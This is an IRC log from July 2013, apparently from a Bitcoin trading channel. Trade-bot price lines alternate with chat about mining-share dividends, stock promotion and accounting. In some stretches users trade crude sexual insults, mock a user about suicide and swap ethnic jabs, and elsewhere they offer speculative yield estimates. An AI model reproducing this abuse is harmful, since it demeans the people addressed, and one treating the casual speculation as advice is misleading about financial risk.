Jul 03 04:42:56 Sure, thing is though, it's 02:41 here ;) Jul 03 04:43:42 Do you know what Chaaang-Noi I might even stay on, for a fellow Bitcoin / Soon to be redditor ;) Jul 03 04:43:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.049999 BTC [+] Jul 03 04:43:48 [HAVELOCK] [ASICM] 3 @ 0.04699989 = 0.141 BTC [+] Jul 03 04:43:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.049999 BTC [+] Jul 03 04:43:51 [BTCTC] [TAT.ASICMINER] 8 @ 0.049999 = 0.4 BTC [+] Jul 03 04:43:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.049997 BTC [-] Jul 03 04:44:04 [HAVELOCK] [ASICM] 29 @ 0.0469999 = 1.363 BTC [+] Jul 03 04:44:20 \o/ Jul 03 04:45:00 http://instagram.com/tsablogteam/ Jul 03 04:45:02 Instagram Jul 03 04:46:35 [BTCTC] [AMC-PT] 100 @ 0.00247 = 0.247 BTC [-] Jul 03 04:47:18 [BTCTC] [TAT.ASICMINER] 52 @ 0.049999 = 2.5999 BTC [+] Jul 03 04:47:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.049999 = 0.1 BTC [+] Jul 03 04:48:09 [HAVELOCK] [ASICM] 721 @ 0.0469999 = 33.8869 BTC [+] Jul 03 04:48:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.05 = 1 BTC [+] Jul 03 04:48:41 [BTCTC] [TAT.ASICMINER] 4 @ 0.05 = 0.2 BTC [+] Jul 03 04:48:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.05 BTC [+] Jul 03 04:49:46 [BTCTC] [BASIC-MINING] 22 @ 0.18 = 3.96 BTC [+] Jul 03 04:50:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.05 BTC [+] Jul 03 04:50:31 [BTCTC] [TAT.ASICMINER] 90 @ 0.05 = 4.5 BTC [+] Jul 03 04:50:33 [BTCTC] [TAT.ASICMINER] 110 @ 0.05 = 5.5 BTC [+] Jul 03 04:50:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.05 = 0.5 BTC [+] Jul 03 04:50:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.05 BTC [+] Jul 03 04:50:39 [BTCTC] [TAT.ASICMINER] 99 @ 0.05 = 4.95 BTC [+] Jul 03 04:51:06 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0045 = 0.45 BTC [-] Jul 03 04:51:47 [HAVELOCK] [KCIM] 38 @ 0.8622 = 32.7636 BTC [+] Jul 03 04:52:27 [BTCTC] [ASICMINER-PT] 1 @ 5 BTC [-] Jul 03 04:52:29 [BTCTC] [ASICMINER-PT] 2 @ 5.009 = 10.018 BTC [+] Jul 03 04:53:32 [HAVELOCK] [HIM] 31 @ 0.32 = 9.92 BTC [+] Jul 03 04:54:59 motherfucker Jul 03 04:55:21 [HAVELOCK] [ASICM] 6 @ 0.04789899 = 0.2874 BTC [+] Jul 03 04:55:54 [BTCTC] [S.MPOE-PT] 1 @ 0.000999 BTC [-] Jul 03 04:57:28 [BTCTC] [CRYPTO-TRADE] 20 @ 0.2 = 4 BTC [+] Jul 03 04:57:39 [BTCTC] [ASICMINER-PT] 2 @ 5 = 10 BTC [-] Jul 03 05:02:27 [BTCTC] [AMC-PT] 5 @ 0.00246 = 0.0123 BTC [-] Jul 03 05:04:01 [BTCTC] [TAT.ASICMINER] 19 @ 0.050126 = 0.9524 BTC [+] Jul 03 05:06:12 [BTCTC] [ASICMINER-PT] 1 @ 4.999 BTC [-] Jul 03 05:06:57 ;;difficulty Jul 03 05:06:58 Error: "difficulty" is not a valid command. Jul 03 05:07:04 ;;help Jul 03 05:07:06 The bot responds when you start a line with the ! character. A good starting point for exploring the bot is the !facts command. You can also visit the bot's website for a list of help topics and documentation: http://gribble.sourceforge.net/ Jul 03 05:07:25 ;;bcstats Jul 03 05:07:27 [BTCTC] [AMC-PT] 24 @ 0.00247 = 0.0593 BTC [+] Jul 03 05:07:29 Current Blocks: 244488 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1463 blocks | Next Difficulty In About: 1 week, 2 days, 9 hours, 4 minutes, and 36 seconds | Next Difficulty Estimate: 23485952.164 | Estimated Percent Change: 10.0801 Jul 03 05:07:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.050126 = 0.2506 BTC [+] Jul 03 05:07:45 ;;estimate Jul 03 05:07:46 Next difficulty estimate | 23485952.164 based on data since last change | 23344389.3887 based on data for last three days Jul 03 05:07:55 ;;nethash Jul 03 05:07:57 167108.198151 Jul 03 05:08:04 [BTCTC] [ASICMINER-PT] 1 @ 4.99899 BTC [-] Jul 03 05:10:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.050126 = 0.1504 BTC [+] Jul 03 05:10:16 [BTCTC] [TAT.ASICMINER] 3 @ 0.050126 = 0.1504 BTC [+] Jul 03 05:11:30 [BTCTC] [TAT.ASICMINER] 5 @ 0.051499 = 0.2575 BTC [+] Jul 03 05:11:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.051499 = 0.2575 BTC [+] Jul 03 05:12:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.051499 = 0.103 BTC [+] Jul 03 05:12:39 [BTCTC] [TAT.ASICMINER] 3 @ 0.051499 = 0.1545 BTC [+] Jul 03 05:13:30 [BTCTC] [ASICMINER-PT] 1 @ 4.999 BTC [+] Jul 03 05:14:13 [BTCTC] [ASICMINER-PT] 2 @ 4.999 = 9.998 BTC [+] Jul 03 05:14:14 [BTCTC] [TAT.ASICMINER] 16 @ 0.0515 = 0.824 BTC [+] Jul 03 05:14:41 [BTCTC] [AMC-PT] 80 @ 0.00247 = 0.1976 BTC [+] Jul 03 05:18:03 [BTCTC] [ASICMINER-PT] 1 @ 4.999 BTC [+] Jul 03 05:19:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.0525 = 0.1575 BTC [+] Jul 03 05:20:01 TAT.finewine Jul 03 05:20:50 [BTCTC] [ASICMINER-PT] 1 @ 5 BTC [+] Jul 03 05:20:56 White House Delays Obamacare Business-Employer Mandate For a Year. Jul 03 05:21:07 Individuals still required to comply. Jul 03 05:21:15 [BTCTC] [ASICMINER-PT] 2 @ 5.009 = 10.018 BTC [+] Jul 03 05:21:21 [BTCTC] [BASIC-MINING] 1 @ 0.18 BTC [+] Jul 03 05:21:40 [BTCTC] [ASICMINER-PT] 2 @ 5.009 = 10.018 BTC [+] Jul 03 05:21:42 [BTCTC] [ASICMINER-PT] 4 @ 5.01 = 20.04 BTC [+] Jul 03 05:22:00 mp is too cool for actual links Jul 03 05:23:45 cause it's on all fo them ? Jul 03 05:24:23 [BTCTC] [S.MPOE-PT] 18 @ 0.001 = 0.018 BTC [+] Jul 03 05:24:35 [BTCTC] [ASICMINER-PT] 4 @ 5.01 = 20.04 BTC [+] Jul 03 05:24:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.052 = 2.6 BTC [-] Jul 03 05:25:14 [BTCTC] [TAT.ASICMINER] 50 @ 0.050001 = 2.5001 BTC [-] Jul 03 05:25:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.05 = 0.5 BTC [-] Jul 03 05:29:07 [BTCTC] [TAT.ASICMINER] 4 @ 0.051899 = 0.2076 BTC [+] Jul 03 05:29:07 [BTCTC] [TAT.ASICMINER] 1077 @ 0.05 = 53.85 BTC [-] Jul 03 05:29:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.05 = 2.5 BTC [-] Jul 03 05:29:07 [BTCTC] [TAT.ASICMINER] 21 @ 0.05 = 1.05 BTC [-] Jul 03 05:29:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.05001 BTC [+] Jul 03 05:30:19 [HAVELOCK] [ASICM] 31 @ 0.04776543 = 1.4807 BTC [-] Jul 03 05:31:20 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.004676 = 0.0514 BTC [+] Jul 03 05:31:33 free doctoring is evilll Jul 03 05:31:53 evildoooerrrzzz Jul 03 05:31:55 free doctoring is about as useful as free stockpicks Jul 03 05:32:51 that is unfortunately true Jul 03 05:33:02 except if the free stockpicks are good? Jul 03 05:33:25 [BTCTC] [TAT.ASICMINER] 46 @ 0.051899 = 2.3874 BTC [+] Jul 03 05:33:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.0519 = 0.2076 BTC [+] Jul 03 05:33:33 to the moon alice Jul 03 05:33:38 well im sure there's also dentists that are hot chicks who give you a secret but great blowjob while you're under Jul 03 05:33:43 it's just improbable that's all. Jul 03 05:35:07 sadly if i had to wait for the gobernmint to get around to giving me a blowjob i'd probably still be a virgin. Jul 03 05:35:35 blowjob counts as devirginazor? Jul 03 05:35:38 i didnt know. Jul 03 05:35:59 best way to go! Jul 03 05:36:21 [BTCTC] [ASICMINER-PT] 1 @ 4.95 BTC [-] Jul 03 05:36:43 im pretty happy with free healthcare here tbh Jul 03 05:36:50 saved my life a few times Jul 03 05:37:19 put my smile back together as good as any private plastic surgeons Jul 03 05:37:24 they are sloppy here Jul 03 05:37:25 it's not sustainable. great for you that you got a free ride, but on the overall it's just sucking the life out of everything Jul 03 05:37:31 my uncle had to get a tooth pulled Jul 03 05:37:32 you on centrelink dub? Jul 03 05:37:37 dole bludging? Jul 03 05:37:37 they pulled the wrong one. Jul 03 05:37:52 VanCleef: your brand names mean nothing to me Jul 03 05:38:00 kakobrekla: lol Jul 03 05:38:08 [HAVELOCK] [KCIM] 1 @ 0.8622 BTC [+] Jul 03 05:38:20 its nice that centrelink pays for dole bludges teeth like yours Jul 03 05:38:35 [HAVELOCK] [VTX] 1 @ 0.515 BTC [+] Jul 03 05:38:39 you two know each other ? Jul 03 05:38:53 no, I don't fuck farm animals Jul 03 05:39:03 whereas VanCleef is australian Jul 03 05:39:16 i was thinking, you didn't pop my aussie detector so far. Jul 03 05:39:16 lol Jul 03 05:39:26 (yes it's sheepshaped) Jul 03 05:39:30 lol Jul 03 05:40:01 maybe he was thinking of a different dub. Jul 03 05:40:09 [HAVELOCK] [ASICM] 1 @ 0.04651 BTC [-] Jul 03 05:40:12 i just like making dub emotional Jul 03 05:40:29 thank you for the emotional reponse Jul 03 05:41:05 since the sheep cant provide such? Jul 03 05:41:18 haha evil. Jul 03 05:41:18 ah, bithub, tell us more about how you are going to suicide because you lost your kids tuition in the btc bubble Jul 03 05:41:19 i think that's nz Jul 03 05:41:34 they like wearing velcro gloves Jul 03 05:42:10 i've faked my death 5 times alredy dub, that's how i get new capital to buy bitcoins Jul 03 05:42:55 do you get new kids each time ? Jul 03 05:43:00 or just re-use the old set Jul 03 05:43:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0519 BTC [+] Jul 03 05:43:36 mircea_popescu: are your kids death prone or something? Jul 03 05:43:49 as dr. venture says Jul 03 05:43:55 if your kids are death prone make clones Jul 03 05:43:58 i don;'t have any. but it stands to reason, if you fake your death then you either don't tell them Jul 03 05:44:03 or else you didn't fake it too well Jul 03 05:44:09 i just ejaculate really hard into dub's mothers asshole till it comes out her nose Jul 03 05:44:20 i've tried that. it's a myth. Jul 03 05:44:25 i don't think the two are even connected. Jul 03 05:44:45 not if you try it really early in the morning, cant get enough pressure Jul 03 05:45:01 anyway, this has been great, see you all tomorro Jul 03 05:45:09 Python interface unloaded Jul 03 05:45:09 Tcl interface unloaded **** ENDING LOGGING AT Wed Jul 3 05:45:09 2013 **** BEGIN LOGGING AT Wed Jul 3 16:17:28 2013 Jul 03 16:19:07 [BTCTC] [ASICMINER-PT] 1 @ 5.029 BTC [+] Jul 03 16:19:12 [BTCTC] [ASICMINER-PT] 1 @ 5.098799 BTC [+] Jul 03 16:19:14 [BTCTC] [ASICMINER-PT] 1 @ 5.0988 BTC [+] Jul 03 16:19:16 [BTCTC] [ASICMINER-PT] 2 @ 5.099 = 10.198 BTC [+] Jul 03 16:20:04 [MPEX] [S.MPOE] 7050 @ 0.00080976 = 5.7088 BTC [+] Jul 03 16:21:07 [BTCTC] [LTC-MINING] 1 @ 0.314359 BTC [+] Jul 03 16:22:32 [BTCTC] [AMC-PT] 150 @ 0.00233 = 0.3495 BTC [+] Jul 03 16:22:34 [BTCTC] [AMC-PT] 100 @ 0.002335 = 0.2335 BTC [+] Jul 03 16:22:35 [BTCTC] [AMC-PT] 100 @ 0.002408 = 0.2408 BTC [+] Jul 03 16:22:36 [BTCTC] [AMC-PT] 200 @ 0.002409 = 0.4818 BTC [+] Jul 03 16:22:37 [BTCTC] [AMC-PT] 100 @ 0.00241 = 0.241 BTC [+] Jul 03 16:22:39 [BTCTC] [AMC-PT] 49 @ 0.00242 = 0.1186 BTC [+] Jul 03 16:22:39 [BTCTC] [AMC-PT] 1301 @ 0.002473 = 3.2174 BTC [+] Jul 03 16:24:22 What are the most likely reasons a public company would promote it's stock as an investment? specifically, AM ? I can think of 3 reasons, but wondering if I'm missing something obvious on this case. Jul 03 16:24:32 its* Jul 03 16:25:28 i can think of more than 3 really ... Jul 03 16:28:46 what? i was thinking most public companies do that Jul 03 16:29:31 [BTCTC] [ASICMINER-PT] 7 @ 5.099 = 35.693 BTC [+] Jul 03 16:29:49 even if they do, why do they start Jul 03 16:29:56 and more specifically why did AM start Jul 03 16:30:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.051399 BTC [-] Jul 03 16:31:27 they got stock options and are want to have good price/liquidity? Jul 03 16:31:47 [MPEX] [S.MPOE] 600 @ 0.00080918 = 0.4855 BTC [-] Jul 03 16:31:49 [MPEX] [S.MPOE] 8450 @ 0.00080891 = 6.8353 BTC [-] Jul 03 16:31:56 [MPEX] [S.MPOE] 2250 @ 0.00080858 = 1.8193 BTC [-] Jul 03 16:31:58 [MPEX] [S.MPOE] 2100 @ 0.00080737 = 1.6955 BTC [-] Jul 03 16:32:04 [MPEX] [S.MPOE] 3400 @ 0.00080732 = 2.7449 BTC [-] Jul 03 16:32:53 [BTCTC] [AMC-PT] 104 @ 0.002472 = 0.2571 BTC [-] Jul 03 16:33:20 [BTCTC] [AMC-PT] 249 @ 0.002473 = 0.6158 BTC [+] Jul 03 16:33:48 [BTCTC] [TAT.ASICMINER] 17 @ 0.051399 = 0.8738 BTC [-] Jul 03 16:33:51 [BTCTC] [TAT.ASICMINER] 4 @ 0.051399 = 0.2056 BTC [-] Jul 03 16:34:19 [BTCTC] [AMC-PT] 1000 @ 0.002474 = 2.474 BTC [+] Jul 03 16:35:01 dipped below 2 month low Jul 03 16:35:06 ;;ticker Jul 03 16:35:07 MtGox BTCUSD ticker | Best bid: 85.00101, Best ask: 85.10019, Bid-ask spread: 0.09918, Last trade: 85.10019, 24 hour volume: 29087.90749145, 24 hour low: 85.60000, 24 hour high: 91.80000, 24 hour vwap: 89.07455 Jul 03 16:36:44 [MPEX] [S.MPOE] 2335 @ 0.00080732 = 1.8851 BTC [-] Jul 03 16:37:33 ThickAsThieves im pretty sure the historical use of the prospectus was Jul 03 16:37:43 "the first advertising of a company's shares" Jul 03 16:37:54 so they start at ipo. Jul 03 16:38:12 well of course they start at IPO Jul 03 16:38:28 but they haven't shown much interest in propping up share price til now Jul 03 16:39:16 even now they could do a better job as well Jul 03 16:40:02 [BTCTC] [ASICMINER-PT] 1 @ 5.099 BTC [+] Jul 03 16:41:06 https://bitcointalk.org/index.php?topic=217104.msg2644002#msg2644002 Jul 03 16:41:12 Block Erupter USB Sales [Temporarily Out of Stock] Jul 03 16:41:59 [MPEX] [S.MPOE] 65 @ 0.00080732 = 0.0525 BTC [-] Jul 03 16:42:04 [MPEX] [S.MPOE] 7450 @ 0.00080465 = 5.9946 BTC [-] Jul 03 16:42:14 [MPEX] [S.MPOE] 8400 @ 0.00080405 = 6.754 BTC [-] Jul 03 16:42:15 [MPEX] [S.MPOE] 5900 @ 0.00080333 = 4.7396 BTC [-] Jul 03 16:42:17 [MPEX] [S.MPOE] 7800 @ 0.00080278 = 6.2617 BTC [-] Jul 03 16:42:18 [MPEX] [S.MPOE] 1000 @ 0.00080001 = 0.8 BTC [-] Jul 03 16:42:53 [MPEX] [S.MPOE] 11200 @ 0.00079897 = 8.9485 BTC [-] Jul 03 16:42:55 [MPEX] [S.MPOE] 15000 @ 0.0007823 = 11.7345 BTC [-] Jul 03 16:43:12 [HAVELOCK] [SDICE] 2 @ 0.19999899 = 0.4 BTC [+] Jul 03 16:44:08 [HAVELOCK] [ASICM] 8 @ 0.049 = 0.392 BTC [-] Jul 03 16:45:09 [HAVELOCK] [ASICM] 67 @ 0.049 = 3.283 BTC [-] Jul 03 16:45:19 [BTCTC] [ASICMINER-PT] 2 @ 5.099 = 10.198 BTC [+] Jul 03 16:45:22 [BTCTC] [ASICMINER-PT] 1 @ 5.1 BTC [+] Jul 03 16:45:24 [BTCTC] [ASICMINER-PT] 1 @ 5.138 BTC [+] Jul 03 16:45:25 davout http://trilema.com/2013/accounting-for-the-nonzero-asset-corporation-the-mpex-standard/#comment-93816 Jul 03 16:45:29 [BTCTC] [ASICMINER-PT] 1 @ 5.138897 BTC [+] Jul 03 16:45:30 this is shaping up nicely. Jul 03 16:45:32 [BTCTC] [ASICMINER-PT] 14 @ 5.138899 = 71.9446 BTC [+] Jul 03 16:45:47 ThickAsThieves maybe it's the first time they had time for it. Jul 03 16:46:01 like, in the design-deploy cycles they have a few weeks off. Jul 03 16:49:11 [HAVELOCK] [ASICM] 14 @ 0.049 = 0.686 BTC [-] Jul 03 16:49:58 [HAVELOCK] [ASICM] 33 @ 0.0489 = 1.6137 BTC [-] Jul 03 16:50:21 [HAVELOCK] [ASICM] 9 @ 0.048802 = 0.4392 BTC [-] Jul 03 16:50:38 [HAVELOCK] [ASICM] 200 @ 0.049 = 9.8 BTC [+] Jul 03 16:51:30 maybe so Jul 03 16:51:46 maybe they'll even make a website Jul 03 16:51:48 [HAVELOCK] [ASICM] 1 @ 0.049 BTC [+] Jul 03 16:51:51 [HAVELOCK] [ASICM] 35 @ 0.049 = 1.715 BTC [+] Jul 03 16:52:20 [BTCTC] [ASICMINER-PT] 1 @ 5.049 BTC [-] Jul 03 16:52:22 [BTCTC] [ASICMINER-PT] 1 @ 5.05 BTC [+] Jul 03 16:52:54 websites are for suckers. Jul 03 16:53:04 generally, if something has a website it's not going anywhere. Jul 03 16:53:24 [BTCTC] [ASICMINER-PT] 1 @ 5.138899 BTC [+] Jul 03 16:53:40 lol Jul 03 16:53:44 you said it man Jul 03 16:54:20 while i can't totally agree, I can tell you my business website was the most neglected thing in my business Jul 03 16:54:25 take all the 54685860958 "payment services" "ipo" ing or taking investment or w/e Jul 03 16:54:28 and we sold websites Jul 03 16:54:30 this is my 2 step process to evaluate them Jul 03 16:54:35 1. does it have a website ? Jul 03 16:54:48 2. if it does, it's not going anywhere. Jul 03 16:54:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.051399 BTC [-] Jul 03 16:55:00 i didn't plan it that way, we were simply too busy doing client work Jul 03 16:57:01 this guy bragging about investing in CIPHERMINE http://www.guardian.co.uk/technology/blog/2013/jul/01/bitcoin-virtual-fortune-crypto-currency Jul 03 16:57:16 polimedia was started in 2007 doing management consultancy Jul 03 16:57:20 have you seen its websuite ? Jul 03 16:57:24 "I still don't quite believe it and there is a very real possibility that all the value could vanish in a puff of logic." Jul 03 16:57:36 lol m Jul 03 16:57:37 k Jul 03 16:57:43 yesterday CIPHERMINE diluted shares, crashing the price Jul 03 16:57:46 lol Jul 03 16:58:22 i'm really displeased with the so called "press" taking over the job of forum muppets Jul 03 16:58:26 [BTCTC] [DMS.PURCHASE] 150 @ 0.049338 = 7.4007 BTC [+] Jul 03 16:58:34 i mean, i bitchslapped keiser all the way back to the cunt of his ugly mother Jul 03 16:58:43 o/ Jul 03 16:58:54 but i can't spend my days and my resources fighting off an endless stream of imbeciles with nothing better to do. Jul 03 16:58:56 arrest the press! Jul 03 16:59:17 just keep up your blog and twitter Jul 03 16:59:21 all you really need to do Jul 03 16:59:24 [HAVELOCK] [ASICM] 2 @ 0.04959 = 0.0992 BTC [+] Jul 03 16:59:25 they'll come to you Jul 03 16:59:36 lol have you noticed how carefully they avoid it ? Jul 03 16:59:52 it is pretty odd Jul 03 16:59:58 i think you are in a weird place Jul 03 17:00:06 where your pov is so stark Jul 03 17:00:12 i mean beating the bushes by now. ciphermine ? da fuck is that even. ltc ? they've moved to ltc nao ? Jul 03 17:00:14 and delivered so unusually Jul 03 17:00:22 that they aren't sure if you are serious Jul 03 17:00:25 and fear you are Jul 03 17:00:44 but that is the very fucking point. american current nonsense, "let's go with what sounds pleasant" Jul 03 17:00:45 well duh. Jul 03 17:00:55 it's easier to see you as some nutjob egomaniac Jul 03 17:00:57 where's my quotiary Jul 03 17:01:09 but they don't realize a nutjob egomaniace can still be correct Jul 03 17:01:25 as a nutjob egomanic, I agree Jul 03 17:01:55 But it's always there in the morning, ain't it - the truth? And it's here right now. You're just feelin' sorry for yourself. That's all it is - self-pity. You didn't kill Skipper. He killed himself. You and Skipper and millions like ya are livin' in a kid's world, playin' games, touchdowns, no worries, no responsibilities. Life ain't no damn football game. Life ain't just a bunch of high spots. You're a thirty-year old Jul 03 17:01:55 kid. Soon you'll be a fifty-year old kid, pretendin' you're hearin' cheers when there ain't any. Dreamin' and drinkin' your life away. Heroes in the real world live twenty-four hours a day, not just two hours in a game. Mendacity, you won't...you won't live with mendacity but you're an expert at it. The truth is pain and sweat and payin' bills and makin' love to a woman that you don't love anymore. Truth is dreams tha Jul 03 17:01:55 t don't come true and nobody prints your name in the paper 'til you die...The truth is, you never grow'd up. Grown-ups don't hang up on their friends...and they don't hang up on their wives...and they don't hang up on life. Now that's the truth and that's what you can't face! Jul 03 17:02:03 there! and it was written by an american to boot. Jul 03 17:02:29 ;;ticker --last Jul 03 17:02:30 84.10000 Jul 03 17:02:34 ew Jul 03 17:03:05 see ? 100+ year old medicine. Jul 03 17:03:43 that's what makes one great. Tennessee Williams is a fucking genius by any measure. Jul 03 17:05:06 how come no one wants bitcons anymore? Jul 03 17:05:44 i thot we were just discussing that. bitcoin is propped by lulz and drama, but nobody wants to buy into idiots. Jul 03 17:05:47 [BTCTC] [ASICMINER-PT] 1 @ 5.000003 BTC [-] Jul 03 17:05:54 i guess by now it's getting unfunny. Jul 03 17:05:59 [MPEX] [S.MPOE] 20000 @ 0.00077251 = 15.4502 BTC [-] Jul 03 17:06:00 [MPEX] [S.MPOE] 368185 @ 0.0007725 = 284.4229 BTC [-] Jul 03 17:06:07 I want bitcoins, but I'm waiting for them to stop dropping Jul 03 17:06:20 bitcoins are so last month...the new thing is justin bieber trading cards Jul 03 17:06:25 though if everyone is doing that, uh… Jul 03 17:07:14 lol Jul 03 17:07:44 also new services using bitpay usually convert to fiat automatically, that puts a lot of pressure downwards, right? Jul 03 17:08:13 yes, bitpay isn't particularly macrostabilizing Jul 03 17:08:22 then again what are they going to do. Jul 03 17:08:23 [BTCTC] [ASICMINER-PT] 2 @ 5.000002 = 10 BTC [-] Jul 03 17:08:25 [BTCTC] [ASICMINER-PT] 1 @ 5 BTC [-] Jul 03 17:08:28 [BTCTC] [ASICMINER-PT] 1 @ 4.911 BTC [-] Jul 03 17:08:30 [BTCTC] [ASICMINER-PT] 1 @ 4.91 BTC [-] Jul 03 17:08:34 [BTCTC] [ASICMINER-PT] 1 @ 4.901 BTC [-] Jul 03 17:08:37 [BTCTC] [ASICMINER-PT] 1 @ 4.89 BTC [-] Jul 03 17:09:02 lack of helium on AM now? Jul 03 17:09:14 [BTCTC] [TAT.ASICMINER] 24 @ 0.0505 = 1.212 BTC [-] Jul 03 17:09:17 [BTCTC] [TAT.ASICMINER] 18 @ 0.050401 = 0.9072 BTC [-] Jul 03 17:09:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0504 BTC [-] Jul 03 17:09:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0502 BTC [-] Jul 03 17:09:22 [BTCTC] [TAT.ASICMINER] 5 @ 0.0502 = 0.251 BTC [-] Jul 03 17:09:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.050001 BTC [-] Jul 03 17:09:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.05 = 0.15 BTC [-] Jul 03 17:09:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.05 = 0.2 BTC [-] Jul 03 17:09:50 [HAVELOCK] [ASICM] 2 @ 0.048851 = 0.0977 BTC [-] Jul 03 17:09:55 I really wonder where this money is coming from and when it will dry up. seemed like we ran out of money around 3 btc Jul 03 17:09:59 the winkelvii will save us Jul 03 17:10:05 then all of a sudden it rained Jul 03 17:10:24 the funny part is that it's out of band since about .65 Jul 03 17:10:38 no worries, there's still plenty of helium around Jul 03 17:10:42 i wouldnt go that far Jul 03 17:11:18 it does pay like .02 weekly divs Jul 03 17:11:30 [BTCTC] [ASICMINER-PT] 1 @ 4.89 BTC [-] Jul 03 17:11:51 0.026 on the last 6 Jul 03 17:11:59 yea so ? Jul 03 17:12:09 http://blogs.reuters.com/felix-salmon/2013/07/02/financial-innovation-of-the-day-winklevii-edition/ Jul 03 17:12:16 Financial innovation of the day, Winklevii edition | Felix Salmon Jul 03 17:12:17 [HAVELOCK] [ASICM] 100 @ 0.048851 = 4.8851 BTC [-] Jul 03 17:12:18 worth reading if you haven't Jul 03 17:12:18 [BTCTC] [TAT.ASICMINER] 3 @ 0.051399 = 0.1542 BTC [+] Jul 03 17:12:49 sourced from http://m.theatlantic.com/business/archive/2013/07/the-winklevoss-twins-want-you-to-invest-in-bitcoin-dont/277478/ Jul 03 17:12:54 mircea_popescu: so an ROI of 30 weeks would be too good for 0.65, not that i know what "out of band" means, just adding to TAT's comment Jul 03 17:12:56 link at the bottom "which it won't" Jul 03 17:13:02 mircea_popescu: I like your accounting scheme. But when you named it did you realize when said "AN0" sounds very similar to "anal"? Jul 03 17:13:06 ericmuyser normally risk comes with a discount. Jul 03 17:13:14 what makes you think they'll be able to keep up for 30 weeks ? Jul 03 17:13:26 peterl kinda. Jul 03 17:13:52 because their hashrate is pretty solid at 0.015 dividend and they have hardware coming and other miners are muppets based on historical evidence Jul 03 17:14:18 so ? s.dice was in the same exact position, or arguably better. less than 30 weeks ago. Jul 03 17:14:20 things change. Jul 03 17:14:29 mircea_popescu: their transparent accounting is what keeps them up :) Jul 03 17:14:30 true Jul 03 17:14:59 yes, they are delivering nicely. but so many contingencies etc. Jul 03 17:15:04 i think they will keep it up for at least 4 weeks, and so i'll take 30% APR for now Jul 03 17:15:16 there's no such thing as 30% apr "for now" Jul 03 17:15:19 30% apr is per year. Jul 03 17:15:25 helium also delivers! for centuries now! xD Jul 03 17:15:33 [MPEX] [S.MPOE] 7452 @ 0.00077585 = 5.7816 BTC [+] Jul 03 17:15:34 [MPEX] [S.MPOE] 117548 @ 0.0007725 = 90.8058 BTC [-] Jul 03 17:16:37 Vbs would prefer we discuss the floating of AMC Jul 03 17:17:03 ThickAsThieves: AMC? That's so 1999. Jul 03 17:17:15 VMC is the new fashion :) Jul 03 17:17:21 poor amc Jul 03 17:17:24 right, so what i mean is i will take 30%/12 for 1 month, and try to stay in something just as good for the remaining 11 Jul 03 17:17:51 peterl: I once read ANALOG as ANAL06 Jul 03 17:18:43 mircea_popescu: interesting points Jul 03 17:19:22 but you don't really seem to think that loss of share value is a valid incentive for management to not misbehave Jul 03 17:20:00 as in not sufficient Jul 03 17:20:16 historia docent Jul 03 17:20:37 moreover, from the history of fiat, i think we're better served by management which doesn't watch share price TOO closely Jul 03 17:20:39 afk Jul 03 17:21:36 well, your points make sense, its an interesting discussion Jul 03 17:22:23 i kindof agree for S.DICE and the ownership of the BTC stash Jul 03 17:22:51 the MPEx case is somewhat different as the stash can obviously not be owned by the managemenbt Jul 03 17:22:58 blurgh, *managemenbt Jul 03 17:23:02 AAARGH Jul 03 17:25:52 mircea_popescu: in the notes on your accounting scheme, what is considered "an approved exchange" for listed investments? Jul 03 17:27:07 [BTCTC] [DMS.SELLING] 1 @ 0.031 BTC [-] Jul 03 17:27:27 peterl that's up to whoever is using the scheme to specify. Jul 03 17:27:55 davout well, it depends what you mean by "owned" Jul 03 17:28:04 if you put 500 euros in the bank, you are now a creditor to the bank Jul 03 17:28:08 mircea_popescu so I've worked on a project that used Crystal Space to make an MMORPG Jul 03 17:28:09 you are not the owner of 500 banked euros Jul 03 17:28:11 oh, I see. What is an accepted exchange for your companies? or do they even own shares of any other companies? Jul 03 17:28:16 mircea_popescu: right Jul 03 17:28:34 peterl here's a bit from the past : http://trilema.com/2012/bitcoin-still-not-quite-ready-for-cdos/ Jul 03 17:28:34 mircea_popescu the general consensus has been: "don't" Jul 03 17:29:02 thestringpuller "general consensus" of whom Jul 03 17:29:02 whichever way you shuffle your words the fact remains that management is entrusted with monetary sums that in fine do not belong to it Jul 03 17:29:10 [BTCTC] [ASICMINER-PT] 1 @ 5.098999 BTC [+] Jul 03 17:29:14 davout well yes. Jul 03 17:29:43 so it might not be completely counterproductive to report them Jul 03 17:30:21 and provide some cryptographic proof of availabity Jul 03 17:30:24 [BTCTC] [ASICMINER-PT] 1 @ 5.08 BTC [-] Jul 03 17:30:45 why would a user want his holdings reported to random passer-by ? Jul 03 17:30:48 mircea_popescu: an mmorpg team? Jul 03 17:30:55 but it doesn't matter Jul 03 17:31:07 unless it's your consensus I imagine you dgaf what anyone says Jul 03 17:31:11 so, if it suddenly decreases by 80% with no apparent reasons the management will somehow be forced to make a statement about it and/or see himself punished by falling valuation Jul 03 17:31:12 even if it was Will Wright himself Jul 03 17:31:25 mircea_popescu: you're assuming extreme detail here Jul 03 17:31:27 thestringpuller well if ww came here to argue it with me i'd certainly hear it out. Jul 03 17:31:49 davout i'm assuming i believe in either do it and do it well or don't do it and say you don't do it. Jul 03 17:31:49 you don't need much more 